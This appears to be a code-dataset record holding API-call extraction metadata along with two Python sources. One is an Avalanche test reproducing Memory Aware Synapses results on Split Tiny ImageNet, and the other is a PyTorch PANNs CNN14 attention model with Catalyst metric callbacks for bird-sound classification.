((36313, 36379), 'functools.partial', 'functools.partial', (['IDotData.openForWrite'], {'headings': 'inFile.headings'}), '(IDotData.openForWrite, headings=inFile.headings)\n', (36330, 36379), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((40262, 40274), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (40265, 40274), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((40727, 40749), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (40746, 40749), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((41098, 41120), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (41117, 41120), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((43503, 43568), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (["(table + ('.tsv' if '.' not in table else ''))", 'scenSfx'], {}), "(table + ('.tsv' if '.' not in table else ''), scenSfx)\n", (43513, 43568), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46695, 46701), 'Operations.MiscUtil.Sfx', 'Sfx', (['i'], {}), '(i)\n', (46698, 46701), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46885, 46906), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showHeadings'], {}), '(showHeadings)\n', (46892, 46906), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50364, 50385), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showHeadings'], {}), '(showHeadings)\n', (50371, 50385), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((23132, 23157), 'os.path.basename', 'os.path.basename', (['outFile'], {}), '(outFile)\n', (23148, 23157), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((50673, 50733), 'Operations.MiscUtil.Dict', 'Dict', (['"""replicaTables replicaCond scenCond"""'], {'allScens': '(scen,)'}), "('replicaTables replicaCond scenCond', allScens=(scen,))\n", (50677, 50733), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((52310, 52347), 'Operations.MiscUtil.dbg', 'dbg', (['""""SKIPPING_REPLICA" thisReplica"""'], {}), '(\'"SKIPPING_REPLICA" thisReplica\')\n', (52313, 52347), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((6547, 6573), 'os.path.splitext', 'os.path.splitext', (['snpTable'], {}), '(snpTable)\n', (6563, 6573), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((32681, 32711), 'os.path.splitext', 'os.path.splitext', (['replicaTable'], {}), '(replicaTable)\n', (32697, 32711), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((43328, 43351), 'os.path.splitext', 'os.path.splitext', (['table'], {}), '(table)\n', (43344, 43351), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((22009, 22034), 'os.path.basename', 'os.path.basename', (['outFile'], {}), '(outFile)\n', (22025, 22034), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((33256, 33278), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (33275, 33278), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((22488, 22618), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables replicaCond snpTables snpCond snpStat nreplicas binSize binShift scenDir scenSfx sfx"""'], {}), "(\n 'Ddata thinSfx replicaTables replicaCond snpTables snpCond snpStat nreplicas binSize binShift scenDir scenSfx sfx'\n )\n", (22492, 22618), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n')] |
import unittest
import torch
from torch.nn import CrossEntropyLoss
from torch.optim import SGD
from avalanche.evaluation.metrics import (
accuracy_metrics,
forgetting_metrics,
loss_metrics
)
from avalanche.training.plugins import EvaluationPlugin
from models import MultiHeadVGGSmall
from strategies.utils import create_default_args, get_average_metric
from strategies.utils import get_target_result, set_seed
import avalanche as avl
class MAS(unittest.TestCase):
"""
Reproducing Memory Aware Synapses experiments from paper
"A continual learning survey: Defying forgetting in classification tasks"
by De Lange et al.
https://doi.org/10.1109/TPAMI.2021.3057446
"""
def test_stinyimagenet(self, override_args=None):
"""Split Tiny ImageNet benchmark"""
args = create_default_args(
{'cuda': 0, 'lambda_reg': 2., 'alpha': 0.5,
'verbose': True, 'learning_rate': 0.005,
'train_mb_size': 200, 'epochs': 70, 'seed': 0,
'dataset_root': None}, override_args)
set_seed(args.seed)
device = torch.device(f"cuda:{args.cuda}"
if torch.cuda.is_available() and
args.cuda >= 0 else "cpu")
"""
"In order to construct a balanced dataset, we assign an equal amount of
20 randomly chosen classes to each task in a sequence of 10 consecutive
tasks. This task incremental setting allows using an oracle at test
time for our evaluation per task, ensuring all tasks are roughly
similar in terms of difficulty, size, and distribution, making the
interpretation of the results easier."
"""
benchmark = avl.benchmarks.SplitTinyImageNet(
10, return_task_id=True, dataset_root=args.dataset_root)
model = MultiHeadVGGSmall(n_classes=20)
criterion = CrossEntropyLoss()
interactive_logger = avl.logging.InteractiveLogger()
evaluation_plugin = EvaluationPlugin(
accuracy_metrics(
epoch=True, experience=True, stream=True
),
loss_metrics(
epoch=True, experience=True, stream=True
),
forgetting_metrics(
experience=True, stream=True
),
loggers=[interactive_logger], benchmark=benchmark)
cl_strategy = avl.training.MAS(
model,
SGD(model.parameters(), lr=args.learning_rate, momentum=0.9),
criterion, lambda_reg=args.lambda_reg, alpha=args.alpha,
verbose=args.verbose, train_mb_size=args.train_mb_size,
train_epochs=args.epochs, eval_mb_size=128, device=device,
evaluator=evaluation_plugin)
res = None
for experience in benchmark.train_stream:
cl_strategy.train(experience)
res = cl_strategy.eval(benchmark.test_stream)
if res is None:
raise Exception("No results found")
avg_stream_acc = get_average_metric(res)
print("MAS-SplitTinyImageNet Average "
f"Stream Accuracy: {avg_stream_acc:.2f}")
# Recover target from CSV
target = get_target_result('mas', 'stiny-imagenet')
if isinstance(target, list):
target_acc = target[0]
else:
target_acc = target
target_acc = float(target_acc)
print(f"The target value was {target_acc:.2f}")
# Check if the result is close to the target
if args.check and target_acc > avg_stream_acc:
self.assertAlmostEqual(target_acc, avg_stream_acc, delta=0.03)
| [
"avalanche.evaluation.metrics.accuracy_metrics",
"avalanche.evaluation.metrics.forgetting_metrics",
"torch.nn.CrossEntropyLoss",
"models.MultiHeadVGGSmall",
"avalanche.logging.InteractiveLogger",
"avalanche.evaluation.metrics.loss_metrics",
"strategies.utils.create_default_args",
"avalanche.benchmarks... | [((819, 1017), 'strategies.utils.create_default_args', 'create_default_args', (["{'cuda': 0, 'lambda_reg': 2.0, 'alpha': 0.5, 'verbose': True,\n 'learning_rate': 0.005, 'train_mb_size': 200, 'epochs': 70, 'seed': 0,\n 'dataset_root': None}", 'override_args'], {}), "({'cuda': 0, 'lambda_reg': 2.0, 'alpha': 0.5, 'verbose':\n True, 'learning_rate': 0.005, 'train_mb_size': 200, 'epochs': 70,\n 'seed': 0, 'dataset_root': None}, override_args)\n", (838, 1017), False, 'from strategies.utils import create_default_args, get_average_metric\n'), ((1069, 1088), 'strategies.utils.set_seed', 'set_seed', (['args.seed'], {}), '(args.seed)\n', (1077, 1088), False, 'from strategies.utils import get_target_result, set_seed\n'), ((1735, 1829), 'avalanche.benchmarks.SplitTinyImageNet', 'avl.benchmarks.SplitTinyImageNet', (['(10)'], {'return_task_id': '(True)', 'dataset_root': 'args.dataset_root'}), '(10, return_task_id=True, dataset_root=args\n .dataset_root)\n', (1767, 1829), True, 'import avalanche as avl\n'), ((1854, 1885), 'models.MultiHeadVGGSmall', 'MultiHeadVGGSmall', ([], {'n_classes': '(20)'}), '(n_classes=20)\n', (1871, 1885), False, 'from models import MultiHeadVGGSmall\n'), ((1906, 1924), 'torch.nn.CrossEntropyLoss', 'CrossEntropyLoss', ([], {}), '()\n', (1922, 1924), False, 'from torch.nn import CrossEntropyLoss\n'), ((1955, 1986), 'avalanche.logging.InteractiveLogger', 'avl.logging.InteractiveLogger', ([], {}), '()\n', (1984, 1986), True, 'import avalanche as avl\n'), ((3041, 3064), 'strategies.utils.get_average_metric', 'get_average_metric', (['res'], {}), '(res)\n', (3059, 3064), False, 'from strategies.utils import create_default_args, get_average_metric\n'), ((3220, 3262), 'strategies.utils.get_target_result', 'get_target_result', (['"""mas"""', '"""stiny-imagenet"""'], {}), "('mas', 'stiny-imagenet')\n", (3237, 3262), False, 'from strategies.utils import get_target_result, set_seed\n'), ((2046, 2104), 'avalanche.evaluation.metrics.accuracy_metrics', 'accuracy_metrics', ([], {'epoch': '(True)', 'experience': '(True)', 'stream': '(True)'}), '(epoch=True, experience=True, stream=True)\n', (2062, 2104), False, 'from avalanche.evaluation.metrics import accuracy_metrics, forgetting_metrics, loss_metrics\n'), ((2148, 2202), 'avalanche.evaluation.metrics.loss_metrics', 'loss_metrics', ([], {'epoch': '(True)', 'experience': '(True)', 'stream': '(True)'}), '(epoch=True, experience=True, stream=True)\n', (2160, 2202), False, 'from avalanche.evaluation.metrics import accuracy_metrics, forgetting_metrics, loss_metrics\n'), ((2246, 2294), 'avalanche.evaluation.metrics.forgetting_metrics', 'forgetting_metrics', ([], {'experience': '(True)', 'stream': '(True)'}), '(experience=True, stream=True)\n', (2264, 2294), False, 'from avalanche.evaluation.metrics import accuracy_metrics, forgetting_metrics, loss_metrics\n'), ((1172, 1197), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1195, 1197), False, 'import torch\n')] |
import logging
import os
import random
import time
import warnings
from collections import OrderedDict
from contextlib import contextmanager
from pathlib import Path
from typing import List, Optional
import cv2
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as data
from IPython.display import Audio
from sklearn.metrics import average_precision_score, f1_score
from sklearn.model_selection import StratifiedKFold
import librosa
import librosa.display as display
import soundfile as sf
import utils
from catalyst.dl import Callback, CallbackOrder, State
class DFTBase(nn.Module):
def __init__(self):
"""Base class for DFT and IDFT matrix"""
super(DFTBase, self).__init__()
def dft_matrix(self, n):
(x, y) = np.meshgrid(np.arange(n), np.arange(n))
omega = np.exp(-2 * np.pi * 1j / n)
W = np.power(omega, x * y)
return W
def idft_matrix(self, n):
(x, y) = np.meshgrid(np.arange(n), np.arange(n))
omega = np.exp(2 * np.pi * 1j / n)
W = np.power(omega, x * y)
return W
class STFT(DFTBase):
def __init__(
self,
n_fft=2048,
hop_length=None,
win_length=None,
window="hann",
center=True,
pad_mode="reflect",
freeze_parameters=True,
):
"""Implementation of STFT with Conv1d. The function has the same output
of librosa.core.stft
"""
super(STFT, self).__init__()
assert pad_mode in ["constant", "reflect"]
self.n_fft = n_fft
self.center = center
self.pad_mode = pad_mode
# By default, use the entire frame
if win_length is None:
win_length = n_fft
# Set the default hop, if it's not already specified
if hop_length is None:
hop_length = int(win_length // 4)
fft_window = librosa.filters.get_window(window, win_length, fftbins=True)
# Pad the window out to n_fft size
fft_window = librosa.util.pad_center(fft_window, n_fft)
# DFT & IDFT matrix
self.W = self.dft_matrix(n_fft)
out_channels = n_fft // 2 + 1
self.conv_real = nn.Conv1d(
in_channels=1,
out_channels=out_channels,
kernel_size=n_fft,
stride=hop_length,
padding=0,
dilation=1,
groups=1,
bias=False,
)
self.conv_imag = nn.Conv1d(
in_channels=1,
out_channels=out_channels,
kernel_size=n_fft,
stride=hop_length,
padding=0,
dilation=1,
groups=1,
bias=False,
)
self.conv_real.weight.data = torch.Tensor(
np.real(self.W[:, 0:out_channels] * fft_window[:, None]).T
)[:, None, :]
# (n_fft // 2 + 1, 1, n_fft)
self.conv_imag.weight.data = torch.Tensor(
np.imag(self.W[:, 0:out_channels] * fft_window[:, None]).T
)[:, None, :]
# (n_fft // 2 + 1, 1, n_fft)
if freeze_parameters:
for param in self.parameters():
param.requires_grad = False
def forward(self, input):
"""input: (batch_size, data_length)
Returns:
real: (batch_size, n_fft // 2 + 1, time_steps)
imag: (batch_size, n_fft // 2 + 1, time_steps)
"""
x = input[:, None, :] # (batch_size, channels_num, data_length)
if self.center:
x = F.pad(x, pad=(self.n_fft // 2, self.n_fft // 2), mode=self.pad_mode)
real = self.conv_real(x)
imag = self.conv_imag(x)
# (batch_size, n_fft // 2 + 1, time_steps)
real = real[:, None, :, :].transpose(2, 3)
imag = imag[:, None, :, :].transpose(2, 3)
# (batch_size, 1, time_steps, n_fft // 2 + 1)
return real, imag
class Spectrogram(nn.Module):
def __init__(
self,
n_fft=2048,
hop_length=None,
win_length=None,
window="hann",
center=True,
pad_mode="reflect",
power=2.0,
freeze_parameters=True,
):
"""Calculate spectrogram using pytorch. The STFT is implemented with
Conv1d. The function has the same output of librosa.core.stft
"""
super(Spectrogram, self).__init__()
self.power = power
self.stft = STFT(
n_fft=n_fft,
hop_length=hop_length,
win_length=win_length,
window=window,
center=center,
pad_mode=pad_mode,
freeze_parameters=True,
)
def forward(self, input):
"""input: (batch_size, 1, time_steps, n_fft // 2 + 1)
Returns:
spectrogram: (batch_size, 1, time_steps, n_fft // 2 + 1)
"""
(real, imag) = self.stft.forward(input)
# (batch_size, n_fft // 2 + 1, time_steps)
spectrogram = real ** 2 + imag ** 2
if self.power == 2.0:
pass
else:
spectrogram = spectrogram ** (power / 2.0)
return spectrogram
class LogmelFilterBank(nn.Module):
def __init__(
self,
sr=32000,
n_fft=2048,
n_mels=64,
fmin=50,
fmax=14000,
is_log=True,
ref=1.0,
amin=1e-10,
top_db=80.0,
freeze_parameters=True,
):
"""Calculate logmel spectrogram using pytorch. The mel filter bank is
the pytorch implementation of as librosa.filters.mel
"""
super(LogmelFilterBank, self).__init__()
self.is_log = is_log
self.ref = ref
self.amin = amin
self.top_db = top_db
self.melW = librosa.filters.mel(
sr=sr, n_fft=n_fft, n_mels=n_mels, fmin=fmin, fmax=fmax
).T
# (n_fft // 2 + 1, mel_bins)
self.melW = nn.Parameter(torch.Tensor(self.melW))
if freeze_parameters:
for param in self.parameters():
param.requires_grad = False
def forward(self, input):
"""input: (batch_size, channels, time_steps)
Output: (batch_size, time_steps, mel_bins)
"""
# Mel spectrogram
mel_spectrogram = torch.matmul(input, self.melW)
# Logmel spectrogram
if self.is_log:
output = self.power_to_db(mel_spectrogram)
else:
output = mel_spectrogram
return output
def power_to_db(self, input):
"""Power to db, this function is the pytorch implementation of
librosa.core.power_to_lb
"""
ref_value = self.ref
log_spec = 10.0 * torch.log10(torch.clamp(input, min=self.amin, max=np.inf))
log_spec -= 10.0 * np.log10(np.maximum(self.amin, ref_value))
if self.top_db is not None:
if self.top_db < 0:
raise ParameterError("top_db must be non-negative")
log_spec = torch.clamp(
log_spec, min=log_spec.max().item() - self.top_db, max=np.inf
)
return log_spec
class DropStripes(nn.Module):
def __init__(self, dim, drop_width, stripes_num):
"""Drop stripes.
Args:
dim: int, dimension along which to drop
drop_width: int, maximum width of stripes to drop
stripes_num: int, how many stripes to drop
"""
super(DropStripes, self).__init__()
assert dim in [2, 3] # dim 2: time; dim 3: frequency
self.dim = dim
self.drop_width = drop_width
self.stripes_num = stripes_num
def forward(self, input):
"""input: (batch_size, channels, time_steps, freq_bins)"""
assert input.ndimension() == 4
if self.training is False:
return input
else:
batch_size = input.shape[0]
total_width = input.shape[self.dim]
for n in range(batch_size):
self.transform_slice(input[n], total_width)
return input
def transform_slice(self, e, total_width):
"""e: (channels, time_steps, freq_bins)"""
for _ in range(self.stripes_num):
distance = torch.randint(low=0, high=self.drop_width, size=(1,))[0]
bgn = torch.randint(low=0, high=total_width - distance, size=(1,))[0]
if self.dim == 2:
e[:, bgn : bgn + distance, :] = 0
elif self.dim == 3:
e[:, :, bgn : bgn + distance] = 0
class SpecAugmentation(nn.Module):
def __init__(
self, time_drop_width, time_stripes_num, freq_drop_width, freq_stripes_num
):
"""Spec augmetation.
[ref] <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>.
and <NAME>., 2019. Specaugment: A simple data augmentation method
for automatic speech recognition. arXiv preprint arXiv:1904.08779.
Args:
time_drop_width: int
time_stripes_num: int
freq_drop_width: int
freq_stripes_num: int
"""
super(SpecAugmentation, self).__init__()
self.time_dropper = DropStripes(
dim=2, drop_width=time_drop_width, stripes_num=time_stripes_num
)
self.freq_dropper = DropStripes(
dim=3, drop_width=freq_drop_width, stripes_num=freq_stripes_num
)
def forward(self, input):
x = self.time_dropper(input)
x = self.freq_dropper(x)
return x
def init_layer(layer):
nn.init.xavier_uniform_(layer.weight)
if hasattr(layer, "bias"):
if layer.bias is not None:
layer.bias.data.fill_(0.0)
def init_bn(bn):
bn.bias.data.fill_(0.0)
bn.weight.data.fill_(1.0)
def do_mixup(x, mixup_lambda):
"""Mixup x of even indexes (0, 2, 4, ...) with x of odd indexes
(1, 3, 5, ...).
Args:
x: (batch_size * 2, ...)
mixup_lambda: (batch_size * 2,)
Returns:
out: (batch_size, ...)
"""
out = (
x[0::2].transpose(0, -1) * mixup_lambda[0::2]
+ x[1::2].transpose(0, -1) * mixup_lambda[1::2]
).transpose(0, -1)
return out
def interpolate(x: torch.Tensor, ratio: int):
"""Interpolate data in time domain. This is used to compensate the
resolution reduction in downsampling of a CNN.
Args:
x: (batch_size, time_steps, classes_num)
ratio: int, ratio to interpolate
Returns:
upsampled: (batch_size, time_steps * ratio, classes_num)
"""
(batch_size, time_steps, classes_num) = x.shape
upsampled = x[:, :, None, :].repeat(1, 1, ratio, 1)
upsampled = upsampled.reshape(batch_size, time_steps * ratio, classes_num)
return upsampled
def pad_framewise_output(framewise_output: torch.Tensor, frames_num: int):
"""Pad framewise_output to the same length as input frames. The pad value
is the same as the value of the last frame.
Args:
framewise_output: (batch_size, frames_num, classes_num)
frames_num: int, number of frames to pad
Outputs:
output: (batch_size, frames_num, classes_num)
"""
pad = framewise_output[:, -1:, :].repeat(
1, frames_num - framewise_output.shape[1], 1
)
"""tensor for padding"""
output = torch.cat((framewise_output, pad), dim=1)
"""(batch_size, frames_num, classes_num)"""
return output
class ConvBlock(nn.Module):
def __init__(self, in_channels: int, out_channels: int):
super().__init__()
self.conv1 = nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
bias=False,
)
self.conv2 = nn.Conv2d(
in_channels=out_channels,
out_channels=out_channels,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
bias=False,
)
self.bn1 = nn.BatchNorm2d(out_channels)
self.bn2 = nn.BatchNorm2d(out_channels)
self.init_weight()
def init_weight(self):
init_layer(self.conv1)
init_layer(self.conv2)
init_bn(self.bn1)
init_bn(self.bn2)
def forward(self, input, pool_size=(2, 2), pool_type="avg"):
x = input
x = F.relu_(self.bn1(self.conv1(x)))
x = F.relu_(self.bn2(self.conv2(x)))
if pool_type == "max":
x = F.max_pool2d(x, kernel_size=pool_size)
elif pool_type == "avg":
x = F.avg_pool2d(x, kernel_size=pool_size)
elif pool_type == "avg+max":
x1 = F.avg_pool2d(x, kernel_size=pool_size)
x2 = F.max_pool2d(x, kernel_size=pool_size)
x = x1 + x2
else:
raise Exception("Incorrect argument!")
return x
class AttBlock(nn.Module):
def __init__(
self, in_features: int, out_features: int, activation="linear", temperature=1.0
):
super().__init__()
self.activation = activation
self.temperature = temperature
self.att = nn.Conv1d(
in_channels=in_features,
out_channels=out_features,
kernel_size=1,
stride=1,
padding=0,
bias=True,
)
self.cla = nn.Conv1d(
in_channels=in_features,
out_channels=out_features,
kernel_size=1,
stride=1,
padding=0,
bias=True,
)
self.bn_att = nn.BatchNorm1d(out_features)
self.init_weights()
def init_weights(self):
init_layer(self.att)
init_layer(self.cla)
init_bn(self.bn_att)
def forward(self, x):
# x: (n_samples, n_in, n_time)
norm_att = torch.softmax(torch.clamp(self.att(x), -10, 10), dim=-1)
cla = self.nonlinear_transform(self.cla(x))
x = torch.sum(norm_att * cla, dim=2)
return x, norm_att, cla
def nonlinear_transform(self, x):
if self.activation == "linear":
return x
elif self.activation == "sigmoid":
return torch.sigmoid(x)
class PANNsCNN14Att(nn.Module):
def __init__(
self,
sample_rate: int,
window_size: int,
hop_size: int,
mel_bins: int,
fmin: int,
fmax: int,
classes_num: int,
):
super().__init__()
window = "hann"
center = True
pad_mode = "reflect"
ref = 1.0
amin = 1e-10
top_db = None
self.interpolate_ratio = 32 # Downsampled ratio
# Spectrogram extractor
self.spectrogram_extractor = Spectrogram(
n_fft=window_size,
hop_length=hop_size,
win_length=window_size,
window=window,
center=center,
pad_mode=pad_mode,
freeze_parameters=True,
)
# Logmel feature extractor
self.logmel_extractor = LogmelFilterBank(
sr=sample_rate,
n_fft=window_size,
n_mels=mel_bins,
fmin=fmin,
fmax=fmax,
ref=ref,
amin=amin,
top_db=top_db,
freeze_parameters=True,
)
# Spec augmenter
self.spec_augmenter = SpecAugmentation(
time_drop_width=64,
time_stripes_num=2,
freq_drop_width=8,
freq_stripes_num=2,
)
self.bn0 = nn.BatchNorm2d(mel_bins)
self.conv_block1 = ConvBlock(in_channels=1, out_channels=64)
self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)
self.conv_block4 = ConvBlock(in_channels=256, out_channels=512)
self.conv_block5 = ConvBlock(in_channels=512, out_channels=1024)
self.conv_block6 = ConvBlock(in_channels=1024, out_channels=2048)
self.fc1 = nn.Linear(2048, 2048, bias=True)
self.att_block = AttBlock(2048, classes_num, activation="sigmoid")
self.init_weight()
def init_weight(self):
init_bn(self.bn0)
init_layer(self.fc1)
def cnn_feature_extractor(self, x):
x = self.conv_block1(x, pool_size=(2, 2), pool_type="avg")
x = F.dropout(x, p=0.2, training=self.training)
x = self.conv_block2(x, pool_size=(2, 2), pool_type="avg")
x = F.dropout(x, p=0.2, training=self.training)
x = self.conv_block3(x, pool_size=(2, 2), pool_type="avg")
x = F.dropout(x, p=0.2, training=self.training)
x = self.conv_block4(x, pool_size=(2, 2), pool_type="avg")
x = F.dropout(x, p=0.2, training=self.training)
x = self.conv_block5(x, pool_size=(2, 2), pool_type="avg")
x = F.dropout(x, p=0.2, training=self.training)
x = self.conv_block6(x, pool_size=(1, 1), pool_type="avg")
x = F.dropout(x, p=0.2, training=self.training)
return x
def preprocess(self, input, mixup_lambda=None):
# t1 = time.time()
x = self.spectrogram_extractor(input) # (batch_size, 1, time_steps, freq_bins)
x = self.logmel_extractor(x) # (batch_size, 1, time_steps, mel_bins)
frames_num = x.shape[2]
x = x.transpose(1, 3)
x = self.bn0(x)
x = x.transpose(1, 3)
if self.training:
x = self.spec_augmenter(x)
# Mixup on spectrogram
if self.training and mixup_lambda is not None:
x = do_mixup(x, mixup_lambda)
return x, frames_num
def forward(self, input, mixup_lambda=None):
"""
Input: (batch_size, data_length)"""
x, frames_num = self.preprocess(input, mixup_lambda=mixup_lambda)
# Output shape (batch size, channels, time, frequency)
x = self.cnn_feature_extractor(x)
# Aggregate in frequency axis
x = torch.mean(x, dim=3)
x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
x = x1 + x2
x = F.dropout(x, p=0.5, training=self.training)
x = x.transpose(1, 2)
x = F.relu_(self.fc1(x))
x = x.transpose(1, 2)
x = F.dropout(x, p=0.5, training=self.training)
(clipwise_output, norm_att, segmentwise_output) = self.att_block(x)
segmentwise_output = segmentwise_output.transpose(1, 2)
# Get framewise output
framewise_output = interpolate(segmentwise_output, self.interpolate_ratio)
framewise_output = pad_framewise_output(framewise_output, frames_num)
output_dict = {
"framewise_output": framewise_output,
"clipwise_output": clipwise_output,
}
return output_dict
class PANNsDataset(data.Dataset):
# def __init__(self, file_list: List[List[str]], waveform_transforms=None, period=5):
def __init__(
self, df, datadir, waveform_transforms=None, period=5, sample_rate=32000
):
# self.file_list = file_list # list of list: [file_path, ebird_code]
self.df = df
self.datadir = datadir
self.waveform_transforms = waveform_transforms
self.period = period
self.sample_rate = sample_rate
def __len__(self):
return len(self.df)
def __getitem__(self, idx: int):
sample = self.df.iloc[idx, :]
# wav_name = sample["resampled_filename"]
wav_name = sample["filename"]
# wav_name = wav_name.replace("mp3", "wav")
wav_name = wav_name.replace("mp3", "npy")
wav_name = wav_name.replace("wav", "npy")
ebird_code = sample["ebird_code"]
duration = sample["duration"]
wav_path = self.datadir / ebird_code / wav_name
# y, sr = sf.read(self.datadir / ebird_code / wav_name)
effective_length = self.sample_rate * self.period
# wav_path, ebird_code = self.file_list[idx]
# y, sr = sf.read(wav_path)
y = np.load(wav_path)
if self.waveform_transforms:
y = self.waveform_transforms(y)
else:
len_y = len(y)
effective_length = self.sample_rate * self.period
if len_y < effective_length:
new_y = np.zeros(effective_length, dtype=y.dtype)
start = np.random.randint(effective_length - len_y)
new_y[start : start + len_y] = y
y = new_y.astype(np.float32)
elif len_y > effective_length:
start = np.random.randint(len_y - effective_length)
y = y[start : start + effective_length].astype(np.float32)
else:
y = y.astype(np.float32)
labels = np.zeros(len(utils.BIRD_CODE), dtype="f")
labels[utils.BIRD_CODE[ebird_code]] = 1
return {"waveform": y, "targets": labels}
class PANNsLoss(nn.Module):
def __init__(self):
super().__init__()
self.bce = nn.BCELoss()
def forward(self, input, target):
input_ = input["clipwise_output"]
input_ = torch.where(torch.isnan(input_), torch.zeros_like(input_), input_)
input_ = torch.where(torch.isinf(input_), torch.zeros_like(input_), input_)
target = target.float()
return self.bce(input_, target)
class F1Callback(Callback):
def __init__(
self,
input_key: str = "targets",
output_key: str = "logits",
model_output_key: str = "clipwise_output",
prefix: str = "f1",
):
super().__init__(CallbackOrder.Metric)
self.input_key = input_key
self.output_key = output_key
self.model_output_key = model_output_key
self.prefix = prefix
def on_loader_start(self, state: State):
self.prediction: List[np.ndarray] = []
self.target: List[np.ndarray] = []
def on_batch_end(self, state: State):
targ = state.input[self.input_key].detach().cpu().numpy()
out = state.output[self.output_key]
clipwise_output = out[self.model_output_key].detach().cpu().numpy()
self.prediction.append(clipwise_output)
self.target.append(targ)
y_pred = clipwise_output.argmax(axis=1)
y_true = targ.argmax(axis=1)
score = f1_score(y_true, y_pred, average="macro")
state.batch_metrics[self.prefix] = score
def on_loader_end(self, state: State):
y_pred = np.concatenate(self.prediction, axis=0).argmax(axis=1)
y_true = np.concatenate(self.target, axis=0).argmax(axis=1)
score = f1_score(y_true, y_pred, average="macro")
state.loader_metrics[self.prefix] = score
if state.is_valid_loader:
state.epoch_metrics[state.valid_loader + "_epoch_" + self.prefix] = score
else:
state.epoch_metrics["train_epoch_" + self.prefix] = score
class mAPCallback(Callback):
def __init__(
self,
input_key: str = "targets",
output_key: str = "logits",
model_output_key: str = "clipwise_output",
prefix: str = "mAP",
):
super().__init__(CallbackOrder.Metric)
self.input_key = input_key
self.output_key = output_key
self.model_output_key = model_output_key
self.prefix = prefix
def on_loader_start(self, state: State):
self.prediction: List[np.ndarray] = []
self.target: List[np.ndarray] = []
def on_batch_end(self, state: State):
targ = state.input[self.input_key].detach().cpu().numpy()
out = state.output[self.output_key]
clipwise_output = out[self.model_output_key].detach().cpu().numpy()
self.prediction.append(clipwise_output)
self.target.append(targ)
score = average_precision_score(targ, clipwise_output, average=None)
score = np.nan_to_num(score).mean()
state.batch_metrics[self.prefix] = score
def on_loader_end(self, state: State):
y_pred = np.concatenate(self.prediction, axis=0)
y_true = np.concatenate(self.target, axis=0)
score = average_precision_score(y_true, y_pred, average=None)
score = np.nan_to_num(score).mean()
state.loader_metrics[self.prefix] = score
if state.is_valid_loader:
state.epoch_metrics[state.valid_loader + "_epoch_" + self.prefix] = score
else:
state.epoch_metrics["train_epoch_" + self.prefix] = score
def get_model(config: dict, weights_path=None):
model = PANNsCNN14Att(**config)
model.att_block = AttBlock(2048, 264, activation="sigmoid")
if weights_path:
checkpoint = torch.load(weights_path)
state_dict = checkpoint["model_state_dict"]
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = k
if k[:7] == "module.":
name = k[7:] # remove `module.`
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
else:
model.att_block.init_weights()
# device = torch.device("cuda")
# model.to(device)
# model.eval()
return model
| [
"torch.nn.BatchNorm1d",
"librosa.util.pad_center",
"torch.nn.functional.avg_pool1d",
"torch.sum",
"torch.nn.functional.pad",
"torch.isinf",
"numpy.imag",
"numpy.arange",
"torch.nn.BatchNorm2d",
